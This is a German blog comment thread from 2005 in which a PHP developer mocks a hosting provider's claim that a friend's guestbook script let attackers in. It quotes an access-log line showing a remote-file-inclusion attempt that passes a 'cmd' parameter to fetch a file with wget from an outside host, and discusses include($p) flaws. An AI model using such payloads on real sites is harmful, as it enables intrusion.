Donnerstag, 24. November 2005
Gibt es Mail-Adresse die kein Alias sind?
Trackbacks
Trackback-URL für diesen Eintrag
Keine Trackbacks
Kommentare
Ansicht der Kommentare:
(Linear | Verschachtelt)
Support und Verwirrung
Da texte ich mal meine aktuelle Story.
Gestern quatscht mich ein Kumpel an, Kunde von Host*urope.
"bla sülz die wollen meinen Account löschen, es sollen Hacker über mein Script auf deren Server gekommen sein"
auf meine Frage wie die darauf kommen, zeigt er mir folgenden Log eintrag.
access_log.www.domain.de:201.11.211.234 - - [17/Nov/2005:10:40:15 +0100] "GET /gbook//index.php?p=http://www.blabla.br/cse.gif?&cmd=cd%20/tmp;wget%20www.blabla.br/dc.txt HTTP/1.1" 200 17047 "-" "-" "www.domain.de "
In dieser gif datei ist halt php Code drin, in dem Versucht wird, halt den Parameter $cmd auszufühen. Der lädt dann irgendein Perl Quellecode nach, welcher dann einen Backdoor kompiliert oder sowas. Egal, bin nicht so der Perl spezi. Aber PHP ist mein Fachgebiet. Also schau ich mir das besagte Script genau an. $p ist der Parameter für die Seite im Gästebuch (index.php?p=2 zb)
Und damit der Quellcode aus der "gif" Datei ausgeführt wird, müsste im Quellcode vom GB Script irgendwo sowas wie "include($p)" stehen, sonst hat es ja keine Auswirkung.
Also hab ich meinem Kumpel gesagt, dass das Script in Ordnung ist, dass die auf jeden fall nicht darüber reingekommen sein können.
Er ruft also beier Hotline an oder so, er quatscht die halt voll mit dem Zeugs was ich ihm geschrieben hab. Da erzählen die ihm, das Script würden Sie löschen, es ist schlimm, dass die Hacker dort schon die URL angeben können zu dem Backdoor (oder sowas in der Art erzählten sie ihm).
Ich fang schon voll an zu lachen, und erklär ihm, ich könnt doch jeden Mist an die URL hängen. (index.php?p=host*urope-ist-scheiße)
Er ruft also wieder an.
Angeblich wären immer große Sicherheitslücken in Scripten aus dem Open-Source bereich! (Unser besagtes Script ist nicht aus dem Open Source bereich, schon mal Blödsinn, ich hatte es mir damals genau angeschaut und es war in Ordnung)
Dann meinte der Supporter (wenn man den überhaupt so bezeichnen darf, meiner Meinung nach nicht), er könnte so (also ich verstehe das so, dass er über die Parameter per GET) [zitat anfang]daß er in jede PHP Datei etwas ablegen könne bzw den code auf diese weise verändern könne[zitat ende]
Ich konnt nicht mehr. Ich programmier so rund 5 Jahre PHP oder vielleicht sogar schon 6 und beschäftige mich viel mit Sicherheit. Daher bin ich schon der Meinung ich hab Ahnung. Aber das hat mir doch gestern den Schuh ausgezogen. Selten so gut gelacht.
So eine kleine Story für euch zum Schmunzeln!!
Da texte ich mal meine aktuelle Story.
Gestern quatscht mich ein Kumpel an, Kunde von Host*urope.
"bla sülz die wollen meinen Account löschen, es sollen Hacker über mein Script auf deren Server gekommen sein"
auf meine Frage wie die darauf kommen, zeigt er mir folgenden Log eintrag.
access_log.www.domain.de:201.11.211.234 - - [17/Nov/2005:10:40:15 +0100] "GET /gbook//index.php?p=http://www.blabla.br/cse.gif?&cmd=cd%20/tmp;wget%20www.blabla.br/dc.txt HTTP/1.1" 200 17047 "-" "-" "www.domain.de "
In dieser gif datei ist halt php Code drin, in dem Versucht wird, halt den Parameter $cmd auszufühen. Der lädt dann irgendein Perl Quellecode nach, welcher dann einen Backdoor kompiliert oder sowas. Egal, bin nicht so der Perl spezi. Aber PHP ist mein Fachgebiet. Also schau ich mir das besagte Script genau an. $p ist der Parameter für die Seite im Gästebuch (index.php?p=2 zb)
Und damit der Quellcode aus der "gif" Datei ausgeführt wird, müsste im Quellcode vom GB Script irgendwo sowas wie "include($p)" stehen, sonst hat es ja keine Auswirkung.
Also hab ich meinem Kumpel gesagt, dass das Script in Ordnung ist, dass die auf jeden fall nicht darüber reingekommen sein können.
Er ruft also beier Hotline an oder so, er quatscht die halt voll mit dem Zeugs was ich ihm geschrieben hab. Da erzählen die ihm, das Script würden Sie löschen, es ist schlimm, dass die Hacker dort schon die URL angeben können zu dem Backdoor (oder sowas in der Art erzählten sie ihm).
Ich fang schon voll an zu lachen, und erklär ihm, ich könnt doch jeden Mist an die URL hängen. (index.php?p=host*urope-ist-scheiße)
Er ruft also wieder an.
Angeblich wären immer große Sicherheitslücken in Scripten aus dem Open-Source bereich! (Unser besagtes Script ist nicht aus dem Open Source bereich, schon mal Blödsinn, ich hatte es mir damals genau angeschaut und es war in Ordnung)
Dann meinte der Supporter (wenn man den überhaupt so bezeichnen darf, meiner Meinung nach nicht), er könnte so (also ich verstehe das so, dass er über die Parameter per GET) [zitat anfang]daß er in jede PHP Datei etwas ablegen könne bzw den code auf diese weise verändern könne[zitat ende]
Ich konnt nicht mehr. Ich programmier so rund 5 Jahre PHP oder vielleicht sogar schon 6 und beschäftige mich viel mit Sicherheit. Daher bin ich schon der Meinung ich hab Ahnung. Aber das hat mir doch gestern den Schuh ausgezogen. Selten so gut gelacht.
So eine kleine Story für euch zum Schmunzeln!!
Warum setzen die PHP noch ein, wenns so gefährlich ist? 
Aber was das "include($p);" angeht: Von dieser Art gibts da draußen echt tausende von Seiten. Ich hab für sowas eine "hallowelt.txt" die ich immer versuche einzubinden - so sehr man darüber lachen kann, so tragisch ist es doch auf der anderen Seite...
Wenn Du dir wirklich sicher bist, dass es nicht am Skript liegen kann, dann Frage ich mich, ob die da wirklich rein geguckt haben oder sich nur auf das Log beziehen - ein guter Provider (und davon kenne ich einige) würde sofort nach zweiterem ersteres machen...
Anbei: Sehr viele Kunden von mir sind von besagtem Provider gewechselt...
Aber was das "include($p);" angeht: Von dieser Art gibts da draußen echt tausende von Seiten. Ich hab für sowas eine "hallowelt.txt" die ich immer versuche einzubinden - so sehr man darüber lachen kann, so tragisch ist es doch auf der anderen Seite...
Wenn Du dir wirklich sicher bist, dass es nicht am Skript liegen kann, dann Frage ich mich, ob die da wirklich rein geguckt haben oder sich nur auf das Log beziehen - ein guter Provider (und davon kenne ich einige) würde sofort nach zweiterem ersteres machen...
Anbei: Sehr viele Kunden von mir sind von besagtem Provider gewechselt...
>> Warum setzen die PHP noch ein, wenns so gefährlich ist?
Das war auch meine erste Frage.
Angeblich befand sich in /tmp eine shellbind.c oder so. Mag ja auch sein dass die "Hacker" auf die Kiste gekommen sind, aber definitiv _nicht_ durch dieses Script. Meine Vermutung ist, dass die einfach die Logs nach dieser URL durchsucht haben.
Als der mich halt anschrieb "die wollen mich löschen bla wegen hackern sülz" war meine erste Vermutung ja das phpbb das er einsetzt. Zudem würd ich nie sowas wie include($p); machen. Einfacher kann man es ja einem Hacker gar nicht machen. So würde früher gerne PHPKit gehackt
Das war auch meine erste Frage.
Angeblich befand sich in /tmp eine shellbind.c oder so. Mag ja auch sein dass die "Hacker" auf die Kiste gekommen sind, aber definitiv _nicht_ durch dieses Script. Meine Vermutung ist, dass die einfach die Logs nach dieser URL durchsucht haben.
Als der mich halt anschrieb "die wollen mich löschen bla wegen hackern sülz" war meine erste Vermutung ja das phpbb das er einsetzt. Zudem würd ich nie sowas wie include($p); machen. Einfacher kann man es ja einem Hacker gar nicht machen. So würde früher gerne PHPKit gehackt
Suche
Read this blog!
Kategorien
Blog abonnieren
Buttons
Kommentare
Fr, 20.10.2017 13:09
Das heißt dann ja eindeutig, d
ass sie Dein Passwort in Klart
ext speichern.
Ist schon zu
lange her, dass ich mich mit
PPP(oE), CHAP und PAP auseinan
derg [...]
Fr, 20.10.2017 13:05
Ich hatte (Wochen) bevor ich m
einen DSL-Anschlussbrief von 1
&1 bekommen habe im Kundeninte
rface das DSL-Passwort geänder
t.
Im Anschlussbrief war st
and [...]
Mi, 28.06.2017 11:29
Diese Information ist für Inte
ressierte bereits in der Übers
chrift enthalten.
Ich glaub
e nicht, dass es mir obliegt d
en Marktbegleiter durch expliz
ite [...]
Mi, 12.04.2017 00:09
Klarer Fall von "Bootloader ve
rgessen". Oder, fast noch schl
immer: Bootloader so verkorkst
, dass das Update nicht funkti
oniert.
Aber das Ding ist o
hneh [...]